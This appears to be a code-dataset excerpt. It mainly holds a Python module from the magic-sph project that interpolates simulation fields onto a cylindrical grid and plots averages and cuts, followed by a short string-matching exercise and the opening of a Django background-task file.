for iphi in progressbar(range(nphi)):\n output[iphi, :] = cylmean(input[0][iphi, ...], radius, cylRad,\n theta)\n if not normed:\n output[iphi, :] *= height\n\n if save:\n nphi, ntheta, nr = input[0].shape\n file = open(filename, 'wb')\n pickle.dump([height, cylRad, phi, output], file) # cylindrical average\n pickle.dump([radius, phi, input[0][:, ntheta//2, :]], file) # equatorial cut\n file.close()\n return height, cylRad, phi, output\n\n elif len(input[0].shape) == 2:\n output = []\n for dat in input:\n outIntZ = np.zeros(ns, dtype=dat.dtype)\n outIntZ = cylmean(dat, radius, cylRad, theta)\n if not normed:\n outIntZ *= height\n output.append(outIntZ)\n\n if save:\n file = open(filename, 'wb')\n pickle.dump([radius, cylRad, height], file) # cylindrical average\n for k,out in enumerate(output):\n pickle.dump(out, file) # cylindrical average\n ntheta, nr = input[k].shape\n pickle.dump(input[k][ntheta//2, :], file) # equatorial cut\n file.close()\n\n return height, cylRad, output\n\nelse:\n\n def zavg(input, radius, ns, minc, save=True, filename='vp.pickle',\n normed=True):\n \"\"\"\n This function computes a z-integration of a list of input arrays \n (on the spherical grid). This works well for 2-D (phi-slice) \n arrays. In case of 3-D arrays, only one element is allowed\n (too demanding otherwise).\n\n :param input: a list of 2-D or 3-D arrays\n :type input: list(numpy.ndarray)\n :param radius: spherical radius\n :type radius: numpy.ndarray\n :param ns: radial resolution of the cylindrical grid (nz=2*ns)\n :type ns: int\n :param minc: azimuthal symmetry\n :type minc: int\n :param save: a boolean to specify if one wants to save the outputs into\n a pickle (default is True)\n :type save: bool\n :param filename: name of the output pickle when save=True\n :type filename: str\n :param normed: a boolean to specify if ones wants to simply integrate\n over z or compute a z-average (default is True: average)\n :type normed: bool\n :returns: a python tuple that contains two numpy.ndarray and a\n list (height,cylRad,output) height[ns] is the height of the\n spherical shell for all radii. cylRad[ns] is the cylindrical\n radius. output=[arr1[ns], ..., arrN[ns]] contains\n the z-integrated output arrays.\n :rtype: tuple\n \"\"\"\n nz = 2*ns\n ro = radius[0]\n ri = radius[-1]\n z = np.linspace(-ro, ro, nz)\n cylRad = np.linspace(0., ro, ns)\n cylRad = cylRad[1:-1]\n\n height = np.zeros_like(cylRad)\n height[cylRad >= ri] = 2.*np.sqrt(ro**2-cylRad[cylRad >= ri]**2)\n height[cylRad < ri] = 2.*(np.sqrt(ro**2-cylRad[cylRad < ri]**2)\n -np.sqrt(ri**2-cylRad[cylRad < ri]**2))\n\n if len(input[0].shape) == 3:\n nphi = input[0].shape[0]\n phi = np.linspace(0., 2.*np.pi/minc, nphi)\n output = np.zeros((nphi, ns-2), dtype=input[0].dtype)\n for iphi in progressbar(range(nphi)):\n Z, S, out2D = sph2cyl_plane([input[0][iphi, ...]], radius, ns)\n S = S[:, 1:-1]\n Z = Z[:, 1:-1]\n output[iphi, :] = np.trapz(out2D[0][:, 1:-1], z, axis=0)\n if normed:\n output[iphi, :] /= height\n\n if save:\n nphi, ntheta, nr = input[0].shape\n file = open(filename, 'wb')\n pickle.dump([cylRad, phi, output], file) # cylindrical average\n pickle.dump([radius, phi, input[0][:, ntheta//2, :]], file) # equatorial cut\n file.close()\n return height, cylRad, phi, output\n elif len(input[0].shape) == 2:\n Z, S, out2D = sph2cyl_plane(input, radius, ns)\n S = S[:, 1:-1]\n Z = Z[:, 1:-1]\n output = []\n outIntZ = np.zeros((ns-2), dtype=input[0].dtype)\n for k,out in enumerate(out2D):\n outIntZ = np.trapz(out[:, 1:-1], z, axis=0)\n if normed:\n outIntZ /= height\n output.append(outIntZ)\n\n if save:\n file = open(filename, 'wb')\n pickle.dump([radius, cylRad, height], file) # cylindrical average\n for k,out in enumerate(output):\n pickle.dump(out, file) # cylindrical average\n ntheta, nr = input[k].shape\n pickle.dump(input[k][ntheta//2, :], file) # equatorial cut\n file.close()\n\n return height, cylRad, output\n\n\ndef sph2cyl(g, ns=None, nz=None):\n \"\"\"\n This function interpolates the three flow (or magnetic field)\n component of a :ref:`G_#.TAG ` file\n on a cylindrical grid of size (ns, nz).\n\n .. warning:: This might be really slow!\n\n :param g: input graphic output file\n :type g: :py:class:`magic.MagicGraph`\n :param ns: number of grid points in the radial direction\n :type ns: int\n :param nz: number of grid points in the vertical direction\n :type nz: int\n :returns: a python tuple of five numpy.ndarray (S,Z,vs,vp_cyl,vz).\n S[nz,ns] is a meshgrid that contains the radial coordinate.\n Z[nz,ns] is a meshgrid that contains the vertical coordinate.\n vs[nz,ns] is the radial component of the velocity (or magnetic\n field), vp_cyl[nz,ns] the azimuthal component and vz[nz,ns] the\n vertical component.\n :rtype: tuple\n \"\"\"\n if ns is None or nz is None:\n ns = g.nr ; nz = 2*ns\n\n theta = np.linspace(0., np.pi, g.ntheta)\n radius = g.radius[::-1]\n\n Z, S = np.mgrid[-radius.max():radius.max():nz*1j,0:radius.max():ns*1j]\n\n new_r = np.sqrt(S**2+Z**2).ravel()\n new_theta = np.arctan2(S, Z).ravel()\n ir = interp1d(radius, np.arange(len(radius)), bounds_error=False)\n it = interp1d(theta, np.arange(len(theta)), bounds_error=False)\n\n new_ir = ir(new_r)\n new_it = it(new_theta)\n new_ir[new_r > radius.max()] = len(radius)-1.\n new_ir[new_r < radius.min()] = 0.\n\n coords = np.array([new_it, new_ir])\n\n vr_cyl = np.zeros((g.npI, nz, ns), dtype=g.vr.dtype)\n vp_cyl = np.zeros_like(vr_cyl)\n vt_cyl = np.zeros_like(vr_cyl)\n for k in progressbar(range(g.npI)):\n dat = map_coordinates(g.vphi[k, :, ::-1], coords, order=3)\n dat[new_r > radius.max()] = 0.\n dat[new_r < radius.min()] = 0.\n vp_cyl[k, ...] = dat.reshape((nz, ns))\n dat = map_coordinates(g.vtheta[k, :, ::-1], coords, order=3)\n dat[new_r > radius.max()] = 0.\n dat[new_r < radius.min()] = 0.\n vt_cyl[k, ...] = dat.reshape((nz, ns))\n dat = map_coordinates(g.vr[k, :, ::-1], coords, order=3)\n dat[new_r > radius.max()] = 0.\n dat[new_r < radius.min()] = 0.\n vr_cyl[k, ...] = dat.reshape((nz, ns))\n\n th3D = np.zeros((g.npI, nz, ns), dtype=g.vr.dtype)\n for i in range(g.npI):\n th3D[i, ...] = np.arctan2(S, Z)\n vs = vr_cyl * np.sin(th3D) + vt_cyl * np.cos(th3D)\n vz = vr_cyl * np.cos(th3D) - vt_cyl * np.sin(th3D)\n\n return S, Z, vs, vp_cyl, vz\n\n\nclass Cyl(MagicSetup):\n \"\"\"\n This class allows to extrapolate a given :ref:`graphic file `\n on a cylindrical grid. Once done, the extrapolated file is stored in\n a python.pickle file. It is then possible to display 2-D cuts of the extrapolated\n arrays (radial cuts, phi-averages, equatorial cuts, z-averages and phi-slices)\n\n .. warning:: This process is actually **very demanding** and it might take a lot\n of time to extrapolate the G_#.TAG file. Be careful when choosing the\n input value of ns!\n\n >>> # Extrapolate the G file to the cylindrical grid (ns=128, nz=2*ns)\n >>> c = Cyl(ivar=1, ns=128)\n >>> # Radial cut of v_r\n >>> c.surf(field='vr', r=0.8)\n >>> # Vertical average of B_\\phi\n >>> c.avgz(field='Bphi', cm='seismic', levels=33)\n >>> # Azimuthal average of v_\\phi\n >>> c.avg(field='Bphi')\n >>> # Equatorial cut of of v_theta\n >>> c.equat(field='vtheta')\n \"\"\"\n\n def __init__(self, ivar=1, datadir='.', ns=None):\n \"\"\"\n :param ivar: the number of the Graphic file\n :type ivar: int\n :param datadir: working directory\n :type datadir: str\n :param ns: number of grid points in the radial direction\n :type ns: int\n \"\"\"\n MagicSetup.__init__(self, datadir)\n\n self.datadir = datadir\n\n filename = '{}G_{}.{}'.format('cyl', ivar, self.tag)\n if not os.path.exists(filename):\n print(\"sph2cyl...\")\n gr = MagicGraph(ivar=ivar, datadir=self.datadir)\n if ns is None:\n self.ns = gr.nr\n self.nz = 2*self.ns\n else:\n self.ns = ns\n self.nz = 2*ns\n self.nphi = gr.nphi\n self.npI = gr.npI\n self.minc = gr.minc\n self.ro = gr.radius[0]\n self.ri = gr.radius[-1]\n self.S, self.Z, self.vs, self.vphi, self.vz = sph2cyl(gr,\n self.ns, self.nz)\n file = open(filename, 'wb')\n pickle.dump([self.ns, self.nz, self.nphi, self.npI, self.minc], file)\n pickle.dump([self.ro, self.ri], file)\n pickle.dump([self.S, self.Z, self.vs, self.vphi, self.vz],\n file)\n file.close()\n else:\n print(\"read cyl file\")\n file = open(filename, 'r')\n self.ns, self.nz, self.nphi, self.npI, self.minc = pickle.load(file)\n self.ro, self.ri = pickle.load(file)\n self.S, self.Z, self.vs, self.vphi, self.vz = \\\n pickle.load(file)\n file.close()\n self.radius = np.linspace(0., self.ro, self.ns)\n temp0, rho0, beta0 = anelprof(np.linspace(self.ro, self.ri, self.ns),\n self.strat, self.polind)\n rho = np.zeros((self.nphi/2, self.ns), dtype=self.vr.dtype)\n beta = np.zeros_like(rho)\n for i in range(self.nphi/2):\n rho[i, :] = rho0\n beta[i, :] = beta0\n Z, S, [rho, beta] = sph2cyl_plane([rho,beta],\n np.linspace(self.ro, self.ri, self.ns),\n self.ns)\n self.rho = np.zeros_like(self.vs)\n self.beta = np.zeros_like(self.vs)\n for i in range(self.npI):\n self.rho[i, ...] = rho\n self.beta[i, ...] = beta\n self.z = np.linspace(-self.ro, self.ro, self.nz)\n\n def surf(self, field='Bphi', r=0.85, vmin=None, vmax=None,\n levels=16, cm='RdYlBu_r', normed=True, figsize=None):\n \"\"\"\n Plot the surface distribution of an input field at a given\n input radius (normalised by the outer boundary radius).\n\n >>> c = Cyl(ns=65)\n >>> # Surface plot of B_\\phi from -10 to 10\n >>> c.surf(field='Bphi', r=0.6, vmin=-10, vmax=10, levels=65)\n\n :param field: name of the input field\n :type field: str\n :param r: radial level (normalised to the outer boundary radius)\n :type r: float\n :param levels: number of contour levels\n :type levels: int\n :param cm: name of the color map\n :type cm: str\n :param normed: when set to True, the contours are normalised fro\n -max(field), max(field)\n :type normed: bool\n :param vmin: truncate the contour levels to values > vmin\n :type vmin: float\n :param vmax: truncate the contour levels to values < vmax\n :type vmax: float\n \"\"\"\n r /= (1-self.ri/self.ro) # as we give a normalised radius\n ind = np.nonzero(np.where(abs(self.radius-r) \\\n == min(abs(self.radius-r)), 1, 0))\n indPlot = ind[0][0]\n\n if field in ('Vr', 'vr', 'Ur', 'ur'):\n data = self.vp\n label = 'Radial velocity'\n elif field in ('Vphi', 'vphi', 'Uphi', 'uphi', 'up', 'Up', 'Vp', 'vp'):\n data = self.vphi\n if labTex:\n label = r'$V_{\\phi}$'\n else:\n label = 'vphi'\n elif field in ('Vs', 'vs'):\n data = self.vs\n label = 'Vs'\n elif field in ('Vz', 'vz'):\n data = self.vz\n label = 'Vz'\n\n phi = np.linspace(0., 2.*np.pi, self.nphi)\n\n data[..., indPlot] = cut(data[..., indPlot], vmax, vmin)\n data = symmetrize(data, self.minc)\n\n cmap = plt.get_cmap(cm)\n\n fig = plt.figure()\n ax = fig.add_subplot(111)\n im = ax.contourf(phi, self.z, data[..., indPlot].T, levels, cmap=cmap,\n aa=True)\n rad = self.radius[indPlot] * (1. - self.ri/self.ro)\n if labTex:\n ax.set_xlabel(r'$\\phi$', fontsize=18)\n ax.set_ylabel(r'$z$', fontsize=18)\n ax.set_title('{}: $r/r_o$ = {:.3f}'.format(label, rad), fontsize=24)\n else:\n ax.set_xlabel('phi', fontsize=18)\n ax.set_ylabel('z', fontsize=18)\n ax.set_title('{}: r/ro = {:.3f}'.format(label, rad), fontsize=24)\n cbar = plt.colorbar(im)\n\n if field not in ['entropy', 's', 'S'] and normed is True:\n im.set_clim(-max(abs(data[..., indPlot].max()),\n abs(data[..., indPlot].min())),\n max(abs(data[..., indPlot].max()),\n abs(data[..., indPlot].min())))\n\n def equat(self, field='vs', levels=16, cm='RdYlBu_r', normed=True, vmax=None,\n vmin=None):\n \"\"\"\n Plot an input field in the equatorial plane.\n\n >>> c = Cyl(ns=65)\n >>> # Equatorial cut of v_\\phi\n >>> c.equat(field='vphi', cm='seismic', levels=33)\n\n :param field: name of the input field\n :type field: str\n :param levels: number of contour levels\n :type levels: int\n :param cm: name of the color map\n :type cm: str\n :param normed: when set to True, the contours are normalised fro\n -max(field), max(field)\n :type normed: bool\n :param vmin: truncate the contour levels to values > vmin\n :type vmin: float\n :param vmax: truncate the contour levels to values < vmax\n :type vmax: float\n \"\"\"\n if field in ('Vr', 'vr', 'Ur', 'ur'):\n data = self.vp\n label = 'Radial velocity'\n elif field in ('beta'):\n data = self.beta\n if labTex:\n label = r'$\\beta$'\n else:\n label = 'beta'\n elif field in ('Vphi', 'vphi', 'Uphi', 'uphi', 'up', 'Up', 'Vp', 'vp'):\n data = self.vphi\n if labTex:\n label = r'$v_{\\phi}$'\n else:\n label = 'vphi'\n elif field in ('Vs', 'vs'):\n data = self.vs\n label = r'$v_s$'\n elif field in ('Vz', 'vz'):\n data = self.vz\n if labTex:\n label = r'$v_z$'\n else:\n label = 'vz'\n elif field in ('dvz'):\n data = cylZder(self.z, self.vz)\n if labTex:\n label = r'$\\partial v_z/\\partial z$'\n else:\n label = 'dvzdz'\n elif field in ('anel'):\n betas = cylSder(self.radius, np.log(self.rho))\n betaz = cylZder(self.z, np.log(self.rho))\n data = self.vs * betas + self.vz * betaz\n if labTex:\n label = r'$\\beta v_r$'\n else:\n label = 'beta vr'\n elif field in ('Cr', 'cr'):\n vp = self.vphi.copy()-self.vphi.mean(axis=0) # convective vp\n data = self.rho * self.vs * vp\n if labTex:\n label = r'$\\langle \\rho v_s v_\\phi\\rangle$'\n else:\n label = 'rho vs vphi'\n\n equator = data[:, self.nz/2,:]\n equator = cut(equator, vmax, vmin)\n equator = symmetrize(equator, self.minc)\n\n phi = np.linspace(0., 2.*np.pi, self.nphi)\n rr, pphi = np.meshgrid(self.radius, phi)\n xx = rr * np.cos(pphi)\n yy = rr * np.sin(pphi)\n\n fig = plt.figure(figsize=(8.25, 6))\n ax = fig.add_subplot(111, frameon=False)\n cmap = plt.get_cmap(cm)\n im = ax.contourf(xx, yy, equator, levels, cmap=cmap)\n ax.plot(self.ri * np.cos(phi), self.ri*np.sin(phi), 'k-')\n ax.plot(self.ro * np.cos(phi), self.ro*np.sin(phi), 'k-')\n ax.set_title(label, fontsize=24)\n ax.axis('off')\n fig.colorbar(im)\n\n if field not in ['entropy', 's', 'S'] and normed is True:\n im.set_clim(-max(abs(equator.max()), abs(equator.min())),\n max(abs(equator.max()), abs(equator.min())))\n\n def avg(self, field='Bphi', levels=16, cm='RdYlBu_r', normed=True,\n vmax=None, vmin=None):\n \"\"\"\n Plot the azimutal average of a given field.\n\n >>> c = Cyl(ns=65)\n >>> # Azimuthal average of B_r\n >>> c.avg(field='Br', cm='seismic', levels=33)\n\n :param field: name of the input field\n :type field: str\n :param levels: number of contour levels\n :type levels: int\n :param cm: name of the color map\n :type cm: str\n :param normed: when set to True, the contours are normalised fro\n -max(field), max(field)\n :type normed: bool\n :param vmin: truncate the contour levels to values > vmin\n :type vmin: float\n :param vmax: truncate the contour levels to values < vmax\n :type vmax: float\n \"\"\"\n if field in ('Vr', 'vr', 'Ur', 'ur'):\n data = self.vp\n label = 'Radial velocity'\n elif field in ('Vphi', 'vphi', 'Uphi', 'uphi', 'up', 'Up', 'Vp', 'vp'):\n data = self.vphi\n if labTex:\n label = r'$V_{\\phi}$'\n else:\n label = 'vphi'\n elif field in ('Vs', 'vs'):\n data = self.vs\n label = 'Vs'\n elif field in ('Vz', 'vz'):\n data = self.vz\n label = 'Vz'\n elif field in ('rho'):\n data = self.rho\n if labTex:\n label = r'$\\rho$'\n else:\n label = 'rho'\n elif field in ('Cr', 'cr'):\n vp = self.vphi.copy()-self.vphi.mean(axis=0) # convective vp\n data = self.vs * vp\n denom = np.sqrt(np.mean(self.vs**2, axis=0)* np.mean(vp**2, axis=0))\n if labTex:\n label = r'$\\langle v_s v_\\phi\\rangle$'\n else:\n label = 'vs vphi'\n\n th = np.linspace(0., np.pi, 128)\n\n if field not in ('Cr', 'cr'):\n phiavg = data.mean(axis=0)\n else:\n mask = np.where(denom == 0, 1, 0)\n phiavg = data.mean(axis=0)/(denom+mask)\n m1 = np.sqrt(self.S**2+self.Z**2) >= self.ri\n m2 = np.sqrt(self.S**2+self.Z**2) <= self.ro\n m3 = self.S <= self.ri\n m4 = self.S >= self.ri\n print('Correlation', phiavg[m1*m2].mean())\n print('Correlation out TC', phiavg[m1*m2*m4].mean())\n print('Correlation in TC', phiavg[m1*m2*m3].mean())\n\n phiavg = cut(phiavg, vmax, vmin)\n\n fig = plt.figure(figsize=(5.5, 8))\n ax = fig.add_subplot(111, frameon=False)\n cmap = plt.get_cmap(cm)\n im = ax.contourf(self.S, self.Z, phiavg, levels, cmap=cmap)\n ax.plot(self.ri*np.sin(th), self.ri*np.cos(th), 'k-')\n ax.plot(self.ro*np.sin(th), self.ro*np.cos(th), 'k-')\n ax.plot([0., 0], [self.ri, self.ro], 'k-')\n ax.plot([0., 0], [-self.ri, -self.ro], 'k-')\n ax.set_title(label, fontsize=24)\n ax.axis('off')\n fig.colorbar(im)\n\n if field not in ['entropy', 's', 'S'] and normed is True:\n im.set_clim(-max(abs(phiavg.max()), abs(phiavg.min())),\n max(abs(phiavg.max()), abs(phiavg.min())))\n\n def avgz(self, field='vs', levels=16, cm='RdYlBu_r', normed=True, vmin=None,\n vmax=None, avg=False):\n \"\"\"\n Plot the vertical average of a given field.\n\n >>> c = Cyl(ns=65)\n >>> # Vertical average of v_s\n >>> c.avg(field='vs', cm='seismic', levels=33)\n\n :param field: name of the input field\n :type field: str\n :param levels: number of contour levels\n :type levels: int\n :param cm: name of the color map\n :type cm: str\n :param normed: when set to True, the contours are normalised fro\n -max(field), max(field)\n :type normed: bool\n :param vmin: truncate the contour levels to values > vmin\n :type vmin: float\n :param vmax: truncate the contour levels to values < vmax\n :type vmax: float\n :param avg: when set to True, an additional figure with the phi-average\n profile is also displayed\n :type avg: bool\n \"\"\"\n phi = np.linspace(0., 2.*np.pi, self.nphi)\n rr, pphi = np.meshgrid(self.radius, phi)\n xx = rr * np.cos(pphi)\n yy = rr * np.sin(pphi)\n if field in ('Vr', 'vr', 'Ur', 'ur'):\n data = self.vphi\n label = 'Radial velocity'\n elif field in ('betaz'):\n betaz = cylZder(self.z, np.log(self.rho))\n data = self.vz * betaz\n data *= self.vs\n if labTex:\n label = r'$\\beta_z u_z$'\n else:\n label = 'betaz uz'\n elif field in ('betas'):\n betas = cylSder(self.radius, np.log(self.rho))\n data = self.vs * betas\n data *= self.vs\n if labTex:\n label = r'$\\beta_s u_s$'\n else:\n label = 'betas us'\n elif field in ('rho'):\n data = self.rho\n if labTex:\n label = r'$\\rho$'\n else:\n label = 'rho'\n elif field in ('anel'):\n vp = self.vphi.copy()-self.vphi.mean(axis=0) # convective vp\n betas = cylSder(self.radius, np.log(self.rho))\n betaz = cylZder(self.z, np.log(self.rho))\n data = self.vs * betas + self.vz * betaz\n data1 = cylSder(self.radius, self.vphi*self.S)-phideravg(self.vs, self.minc)\n mask = np.where(self.S == 0, 1, 0)\n data1 = data1/(self.S+mask)\n data *= data1\n if labTex:\n label = r'$\\beta u_r$'\n else:\n label = 'beta ur'\n elif field in ('vortz'):\n data = cylSder(self.radius, self.vphi*self.S)-phideravg(self.vs, self.minc)\n mask = np.where(self.S == 0, 1, 0)\n data = data/(self.S+mask)\n if labTex:\n label = r'$\\omega_z$'\n else:\n label = 'omegaz'\n elif field in ('vopot'):\n data = cylSder(self.radius, self.vphi*self.S)-phideravg(self.vs, self.minc)\n mask = np.where(self.S == 0, 1, 0)\n data = data/(self.S+mask)\n data = data-2./self.ek*np.log(self.rho)\n label = 'vopot'\n elif field in ('Vphi', 'vphi', 'Uphi', 'uphi', 'up', 'Up', 'Vp', 'vp'):\n data = self.vphi\n if labTex:\n label = r'$V_{\\phi}$'\n else:\n label = 'vphi'\n elif field in ('Vs', 'vs'):\n data = self.vs\n if labTex:\n label = r'$v_s$'\n else:\n label = 'vs'\n elif field in ('Vz', 'vz'):\n data = self.vz\n if labTex:\n label = r'$v_z$'\n else:\n label = 'vz'\n elif field in ('vpc'):\n data = self.vphi.copy()-self.vphi.mean(axis=0) # convective vp\n if labTex:\n label = r'$v_p$ conv'\n else:\n label = 'vphi conv'\n elif field in ('Cr', 'cr'):\n vp = self.vphi.copy()-self.vphi.mean(axis=0) # convective vp\n data = self.rho * self.vs * vp\n denom = np.zeros((self.npI, self.ns), dtype=vp.dtype)\n if labTex:\n label = r'$\\langle \\rho v_s v_\\phi\\rangle$'\n else:\n label = 'rho vs vphi'\n elif field in ('reynolds'):\n vp = self.vphi.copy()-self.vphi.mean(axis=0) # convective vp\n phi = np.linspace(0., 2.*np.pi, self.npI)\n data = self.rho * self.vs * vp\n if labTex:\n label = r'$\\rho v_s v_\\phi$'\n else:\n label = 'rho vs vphi'\n elif field in ('vsvp'):\n vp = self.vphi.copy()-self.vphi.mean(axis=0) # convective vp\n phi = np.linspace(0., 2.*np.pi, self.npI)\n data = self.vs * vp\n if labTex:\n label = r'$v_s v_\\phi$'\n else:\n label = 'vs vphi'\n elif field in ('vrvs'):\n th2D = np.arctan2(self.S, self.Z)\n vr = self.vs * np.sin(th2D) + self.vz * np.cos(th2D)\n phi = np.linspace(0., 2.*np.pi, self.npI)\n data = self.vs * vr\n denom = np.zeros((self.npI, self.ns), dtype=vr.dtype)\n if labTex:\n label = r'$\\rho v_s v_r$'\n else:\n label = 'rho vs vr'\n elif field in ('dvz'):\n data = cylZder(self.z, self.vz)\n data1 = cylSder(self.radius, self.vphi*self.S)-phideravg(self.vs, self.minc)\n mask = np.where(self.S == 0, 1, 0)\n data1 = data1/(self.S+mask)\n data *= data1\n if labTex:\n label = r'$\\partial v_z/\\partial z$'\n else:\n label = 'dvz/dz'\n elif field in ('balance'):\n if labTex:\n label = r'$\\partial v_z/\\partial z+\\beta v_r$'\n else:\n label = 'dvz/dz + beta*vr'\n data = cylZder(self.z, self.vz)\n betas = cylSder(self.radius, np.log(self.rho))\n betaz = cylZder(self.z, np.log(self.rho))\n data1 = self.vs * betas + self.vz * betaz\n data += data1\n data2 = cylSder(self.radius, self.vphi*self.S)-phideravg(self.vs, self.minc)\n mask = np.where(self.S == 0, 1, 0)\n data2 = data2/(self.S+mask)\n data *= data2\n\n equator = np.zeros((self.npI, self.ns), dtype=self.vs.dtype)\n for i, rad in enumerate(self.radius):\n if rad <= self.ri:\n zo = np.sqrt(self.ro**2-rad**2)\n zi = np.sqrt(self.ri**2-rad**2)\n m1 = abs(self.z) <= zo\n m2 = abs(self.z) >= zi\n equator[:, i] = data[:, m1*m2, i].mean(axis=1)\n if field in ('Cr', 'cr'):\n denom[:, i] = np.sqrt( \\\n np.mean(self.rho[:, m1*m2, i]*self.vs[:, m1*m2, i]**2, axis=1)\\\n * np.mean(self.rho[:, m1*m2, i]*vp[:, m1*m2, i]**2, axis=1))\n elif field in ('vrvs'):\n denom[:, i] = np.sqrt( \\\n np.mean(vr[:, m1*m2, i]**2, axis=1)\\\n * np.mean(self.vs[:, m1*m2, i]**2, axis=1))\n elif rad > self.ri and rad < self.ro:\n zo = np.sqrt(self.ro**2-rad**2)\n m1 = self.z >= -zo\n m2 = self.z <= zo\n equator[:, i] = data[:, m1*m2, i].mean(axis=1)\n if field in ('Cr', 'cr'):\n denom[:, i] = np.sqrt( \\\n np.mean(self.rho[:, m1*m2, i]*self.vs[:, m1*m2, i]**2, axis=1)\\\n * np.mean(self.rho[:, m1*m2, i]*vp[:, m1*m2, i]**2, axis=1))\n elif field in ('vrvs'):\n denom[:, i] = np.sqrt( \\\n np.mean(vr[:, m1*m2, i]**2, axis=1)\\\n * np.mean(self.vs[:, m1*m2, i]**2, axis=1))\n if field in ('Cr', 'cr', 'vrvs'):\n mask = np.where(denom == 0, 1, 0)\n equator /= (denom+mask)\n\n equator = cut(equator, vmax, vmin)\n equator = symmetrize(equator, self.minc)\n\n\n fig = plt.figure(figsize=(8.25, 6))\n ax = fig.add_subplot(111, frameon=False)\n cmap = plt.get_cmap(cm)\n im = ax.contourf(xx, yy, equator, levels, cmap=cmap)\n ax.plot(self.ri * np.cos(phi), self.ri*np.sin(phi), 'k-')\n ax.plot(self.ro * np.cos(phi), self.ro*np.sin(phi), 'k-')\n ax.set_title(label, fontsize=24)\n ax.axis('off')\n fig.colorbar(im)\n if avg:\n fig = plt.figure()\n ax = fig.add_subplot(111)\n if field in ('vphi'):\n dat = np.mean(equator, axis=0)\n dat = dat[:-1]\n ax.plot(self.radius[:-1], dat)\n else:\n ax.plot(self.radius, np.mean(equator, axis=0))\n ax.set_xlabel('Radius', fontsize=18)\n ax.set_xlim(0, self.radius.max())\n\n if field not in ['entropy', 's', 'S'] and normed is True:\n im.set_clim(-max(abs(equator.max()), abs(equator.min())),\n max(abs(equator.max()), abs(equator.min())))\n\n def slice(self, field='Bphi', lon_0=0., levels=16, cm='RdYlBu_r',\n normed=True):\n \"\"\"\n Plot an azimuthal slice of a given field.\n\n >>> c = Cyl(ns=65)\n >>> # Slices of v_r at 30 and 60 degrees\n >>> c.slice(field='vr', lon_0=[30, 60])\n\n :param field: name of the input field\n :type field: str\n :param lon_0: the longitude of the slice in degrees, or a list of longitudes\n :type lon_0: float or list\n :param levels: number of contour levels\n :type levels: int\n :param cm: name of the color map\n :type cm: str\n :param normed: when set to True, the contours are normalised fro\n -max(field), max(field)\n :type normed: bool\n \"\"\"\n if field in ('Vr', 'vr', 'Ur', 'ur'):\n data = self.vp\n label = 'Radial velocity'\n elif field in ('Vphi', 'vphi', 'Uphi', 'uphi', 'up', 'Up', 'Vp', 'vp'):\n data = self.vphi\n if labTex:\n label = r'$v_{phi}$'\n else:\n label = 'vphi'\n elif field in ('Vs', 'vs'):\n data = self.vs\n if labTex:\n label = r'$v_s$'\n else:\n label = 'vs'\n elif field in ('Vz', 'vz'):\n data = self.vz\n if labTex:\n label = r'$v_z$'\n else:\n label = 'vz'\n\n data = symmetrize(data, self.minc)\n\n th = np.linspace(-np.pi/2, np.pi/2, 128)\n phi = np.linspace(0., 360, self.nphi)\n\n lon_0 = np.asarray(lon_0)\n\n cmap = plt.get_cmap(cm)\n\n if len(lon_0) > 1:\n fig = plt.figure(figsize=(3.5*len(lon_0), 5.1))\n for k, lon in enumerate(lon_0):\n ind = np.nonzero(np.where(abs(phi-lon) \\\n == min(abs(phi-lon)), 1, 0))\n indPlot = ind[0][0]\n phislice = data[indPlot, ...]\n ax = fig.add_subplot(1,len(lon_0),k+1, frameon=False)\n\n im = ax.contourf(self.S, self.Z, phislice, levels, cmap=cmap)\n ax.plot(self.ro*np.cos(th), self.ro*np.sin(th), 'k-')\n ax.plot(self.ri*np.cos(th), self.ri*np.sin(th), 'k-')\n ax.plot([0., 0], [self.ri, self.ro], 'k-')\n ax.plot([0., 0], [-self.ri, -self.ro], 'k-')\n ax.axis('off')\n ax.set_title(label+r' ${}^\\circ$'.format(lon))\n #fig.colorbar(im, orientation='horizontal')\n\n else:\n ind = np.nonzero(np.where(abs(phi-lon_0[0]) \\\n == min(abs(phi-lon_0[0])), 1, 0))\n indPlot = ind[0][0]\n phislice = data[indPlot, ...]\n\n fig = plt.figure(figsize=(5.5, 8))\n ax = fig.add_subplot(111, frameon=False)\n im = ax.contourf(self.S, self.Z, phislice, levels, cmap=cmap)\n ax.plot(self.ro*np.cos(th), self.ro*np.sin(th), 'k-')\n ax.plot(self.ri*np.cos(th), self.ri*np.sin(th), 'k-')\n ax.plot([0., 0], [self.ri, self.ro], 'k-')\n ax.plot([0., 0], [-self.ri, -self.ro], 'k-')\n ax.set_title(label, fontsize=24)\n ax.axis('off')\n fig.colorbar(im)\n\n if field not in ['entropy', 's', 'S'] and normed is True:\n im.set_clim(-max(abs(phislice.max()), abs(phislice.min())),\n max(abs(phislice.max()), abs(phislice.min())))\n\n\n\n\nif __name__ == '__main__':\n c = Cyl(ivar=1)\n c.equat(field='vs', normed=False)\n plt.show()\n","repo_name":"magic-sph/magic","sub_path":"python/magic/cyl.py","file_name":"cyl.py","file_ext":"py","file_size_in_byte":38793,"program_lang":"python","lang":"en","doc_type":"code","stars":72,"dataset":"github-code","pt":"31"} +{"seq_id":"73276806487","text":"def string_match(str1, str2):\n substr1 = []\n substr2 = []\n\n for i in range(len(str1) - 1):\n substr1.append(str1[i:(i+2)]) \n \n for j in range(len(str2) - 1):\n substr2.append(str2[j:(j+2)])\n\n\n main_lenght = min_lenght(substr1, substr2)\n \n count = 0\n for i in range(main_lenght):\n if substr1[i] == substr2[i]:\n count = count + 1\n return count\n\ndef min_lenght(arr1, arr2):\n m = len(arr1)\n n = len(arr2)\n\n if m < n:\n k = m \n elif n < m:\n k = n\n else: \n k = m = n\n\n return k\n\n\nresult = string_match('aabbccdd', 'abbbxxd')\nprint(result)\nresult = string_match('abc', 'abc')\nprint(result)\nresult = string_match('aaxxaaxx', 'iaxxai')\nprint(result)\nresult = string_match('iaxxai', 'aaxxaaxx')\nprint(result)","repo_name":"Akankshasharmaa/45DaysOfPython","sub_path":"day5/d5p1.py","file_name":"d5p1.py","file_ext":"py","file_size_in_byte":798,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"7096683269","text":"# -*- coding: utf-8 -*-\n\"\"\"Tasks for WAStD.\"\"\"\nimport logging\nimport os\n\nfrom background_task import background\nfrom django.conf import settings\nfrom django.utils import timezone\nfrom sentry_sdk import capture_message\n\nfrom wastd.observations import utils\n\nlogger = logging.getLogger(__name__)\n\n\n@background(queue=\"admin-tasks\", schedule=timezone.now())\ndef update_names():\n \"\"\"Update cached names on Encounters and Loggers and reconstructs Surveys.\"\"\"\n msg = \"[wastd.observations.tasks.update_names] Start updating 